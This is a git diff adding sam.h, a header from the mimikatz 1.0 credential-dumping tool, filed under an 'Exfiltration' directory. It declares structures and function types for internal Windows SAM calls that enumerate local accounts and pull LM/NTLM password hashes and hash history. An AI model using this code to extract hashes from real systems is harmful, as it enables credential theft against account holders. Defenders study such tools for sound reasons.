aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h')
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h210
1 files changed, 210 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
new file mode 100644
index 0000000..870aa4d
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
@@ -0,0 +1,210 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+ Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "kmodel.h"
+#include "mod_text.h"
+#include <sstream>
+#include <iomanip>
+
+bool searchSAMFuncs();
+__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments);
+
+#define SAM_SERVER_CONNECT 0x00000001
+#define DOMAIN_ALL_ACCESS 0x000F07FF
+#define USER_ALL_ACCESS 0x000F07FF
+
+#define USER_ACCOUNT_DISABLED 0x00000001
+#define USER_PASSWORD_NOT_REQUIRED 0x00000004
+#define USER_NORMAL_ACCOUNT 0x00000010
+#define USER_WORKSTATION_TRUST_ACCOUNT 0x00000080
+#define USER_SERVER_TRUST_ACCOUNT 0x00000100
+#define USER_DONT_EXPIRE_PASSWORD 0x00000200
+#define USER_ACCOUNT_AUTO_LOCKED 0x00000400
+#define USER_SMARTCARD_REQUIRED 0x00001000
+#define USER_TRUSTED_FOR_DELEGATION 0x00002000
+#define USER_PASSWORD_EXPIRED 0x00020000
+
+typedef struct _WUserAllInformation
+{
+ unsigned long UserId;
+ wstring UserName;
+ wstring DomaineName;
+ wstring FullName;
+ bool isActif;
+ bool isLocked;
+ wstring TypeCompte;
+ wstring UserComment;
+ wstring AdminComment;
+ wstring AccountExpires;
+ wstring AccountExpires_strict;
+ wstring WorkStations;
+
+ wstring HomeDirectory;
+ wstring HomeDirectoryDrive;
+ wstring ProfilePath;
+ wstring ScriptPath;
+
+ unsigned short LogonCount;
+ unsigned short BadPasswordCount;
+ wstring LastLogon;
+ wstring LastLogon_strict;
+ wstring LastLogoff;
+ wstring LastLogoff_strict;
+
+ wstring PasswordLastSet;
+ wstring PasswordLastSet_strict;
+ bool isPasswordNotExpire;
+ bool isPasswordNotRequired;
+ bool isPasswordExpired;
+ wstring PasswordCanChange;
+ wstring PasswordCanChange_strict;
+ wstring PasswordMustChange;
+ wstring PasswordMustChange_strict;
+
+ bool LmPasswordPresent;
+ wstring LmOwfPassword;
+ bool NtPasswordPresent;
+ wstring NtOwfPassword;
+} WUserAllInformation, *PUserAllInformation;
+
+typedef struct _WHashHistory
+{
+ DWORD unkVersion;
+ unsigned short currentLMsize;
+ unsigned short unkCurrentLMsize;
+ DWORD unkCurLM;
+ BYTE EncLMhash[16];
+
+ unsigned short currentNTLMsize;
+ unsigned short unkCurrentNTLMsize;
+ DWORD unkCurNTLM;
+ BYTE EncNTLMhash[16];
+
+ unsigned short histLMsize;
+ unsigned short unkhistLMsize;
+ DWORD unkHistLM;
+
+ unsigned short histNTLMsize;
+ unsigned short unkhistNTLMsize;
+ DWORD unkHistNTLM;
+ BYTE hashs[24][16];
+} WHashHistory, *PWHashHistory;
+
+DECLARE_HANDLE(HUSER);
+DECLARE_HANDLE(HSAM);
+DECLARE_HANDLE(HDOMAIN);
+
+typedef struct _SAMPR_RID_ENUMERATION
+{
+ unsigned long RelativeId;
+ LSA_UNICODE_STRING Name;
+} SAMPR_RID_ENUMERATION, *PSAMPR_RID_ENUMERATION;
+
+typedef struct _SAMPR_ENUMERATION_BUFFER
+{
+ unsigned long EntriesRead;
+ [size_is(EntriesRead)] PSAMPR_RID_ENUMERATION Buffer;
+} SAMPR_ENUMERATION_BUFFER, *PSAMPR_ENUMERATION_BUFFER;
+
+typedef enum _USER_INFORMATION_CLASS
+{
+ UserInternal1Information = 18,
+ UserAllInformation = 21,
+} USER_INFORMATION_CLASS, *PUSER_INFORMATION_CLASS;
+
+typedef struct _ENCRYPTED_LM_OWF_PASSWORD
+{
+ BYTE data[16];
+} ENCRYPTED_LM_OWF_PASSWORD, *PENCRYPTED_LM_OWF_PASSWORD, ENCRYPTED_NT_OWF_PASSWORD, *PENCRYPTED_NT_OWF_PASSWORD;
+
+typedef struct _SAMPR_USER_INTERNAL1_INFORMATION
+{
+ ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword;
+ ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword;
+ unsigned char NtPasswordPresent;
+ unsigned char LmPasswordPresent;
+ unsigned char PasswordExpired;
+} SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION;
+
+typedef struct _OLD_LARGE_INTEGER {
+ unsigned long LowPart;
+ long HighPart;
+} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER;
+
+typedef struct _SAMPR_SR_SECURITY_DESCRIPTOR {
+ [range(0, 256 * 1024)] unsigned long Length;
+ [size_is(Length)] unsigned char* SecurityDescriptor;
+} SAMPR_SR_SECURITY_DESCRIPTOR, *PSAMPR_SR_SECURITY_DESCRIPTOR;
+
+typedef struct _SAMPR_LOGON_HOURS {
+ unsigned short UnitsPerWeek;
+ [size_is(1260), length_is((UnitsPerWeek+7)/8)]
+ unsigned char* LogonHours;
+} SAMPR_LOGON_HOURS, *PSAMPR_LOGON_HOURS;
+
+typedef struct _SAMPR_USER_ALL_INFORMATION
+{
+ OLD_LARGE_INTEGER LastLogon;
+ OLD_LARGE_INTEGER LastLogoff;
+ OLD_LARGE_INTEGER PasswordLastSet;
+ OLD_LARGE_INTEGER AccountExpires;
+ OLD_LARGE_INTEGER PasswordCanChange;
+ OLD_LARGE_INTEGER PasswordMustChange;
+ LSA_UNICODE_STRING UserName;
+ LSA_UNICODE_STRING FullName;
+ LSA_UNICODE_STRING HomeDirectory;
+ LSA_UNICODE_STRING HomeDirectoryDrive;
+ LSA_UNICODE_STRING ScriptPath;
+ LSA_UNICODE_STRING ProfilePath;
+ LSA_UNICODE_STRING AdminComment;
+ LSA_UNICODE_STRING WorkStations;
+ LSA_UNICODE_STRING UserComment;
+ LSA_UNICODE_STRING Parameters;
+ LSA_UNICODE_STRING LmOwfPassword;
+ LSA_UNICODE_STRING NtOwfPassword;
+ LSA_UNICODE_STRING PrivateData;
+ SAMPR_SR_SECURITY_DESCRIPTOR SecurityDescriptor;
+ unsigned long UserId;
+ unsigned long PrimaryGroupId;
+ unsigned long UserAccountControl;
+ unsigned long WhichFields;
+ SAMPR_LOGON_HOURS LogonHours;
+ unsigned short BadPasswordCount;
+ unsigned short LogonCount;
+ unsigned short CountryCode;
+ unsigned short CodePage;
+ unsigned char LmPasswordPresent;
+ unsigned char NtPasswordPresent;
+ unsigned char PasswordExpired;
+ unsigned char PrivateDataSensitive;
+} SAMPR_USER_ALL_INFORMATION, *PSAMPR_USER_ALL_INFORMATION;
+
+typedef [switch_is(USER_INFORMATION_CLASS)] union _SAMPR_USER_INFO_BUFFER /* http://msdn.microsoft.com/en-us/library/cc211885.aspx */
+{
+ [case(UserInternal1Information)]
+ SAMPR_USER_INTERNAL1_INFORMATION Internal1;
+ [case(UserAllInformation)]
+ SAMPR_USER_ALL_INFORMATION All;
+} SAMPR_USER_INFO_BUFFER, *PSAMPR_USER_INFO_BUFFER;
+
+WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr);
+bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV = false);
+bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV = false);
+wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict = false);
+wstring protectMe(wstring &maChaine);
+void correctMe(wstring &maChaine);
+
+typedef NTSTATUS (WINAPI * PSAM_I_CONNECT) (DWORD, HSAM *, DWORD, DWORD);
+typedef NTSTATUS (WINAPI * PSAM_R_OPEN_DOMAIN) (HSAM, DWORD dwAccess, PSID, HDOMAIN*);
+typedef NTSTATUS (WINAPI * PSAM_R_OPEN_USER) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*);
+typedef NTSTATUS (WINAPI * PSAM_R_ENUMERATE_USERS_IN_DOMAIN) (HDOMAIN, DWORD*, DWORD, PSAMPR_ENUMERATION_BUFFER *, DWORD, PVOID);
+typedef NTSTATUS (WINAPI * PSAM_R_QUERY_INFORMATION_USER) (HUSER, DWORD, PSAMPR_USER_INFO_BUFFER *);
+typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD);
+typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER) (PSAMPR_ENUMERATION_BUFFER);
+typedef NTSTATUS (WINAPI * PSAM_R_CLOSE_HANDLE) (PHANDLE);
+typedef NTSTATUS (WINAPI * PSAM_I_GET_PRIVATE_DATA) (HUSER, DWORD *, DWORD *, DWORD *, PWHashHistory *);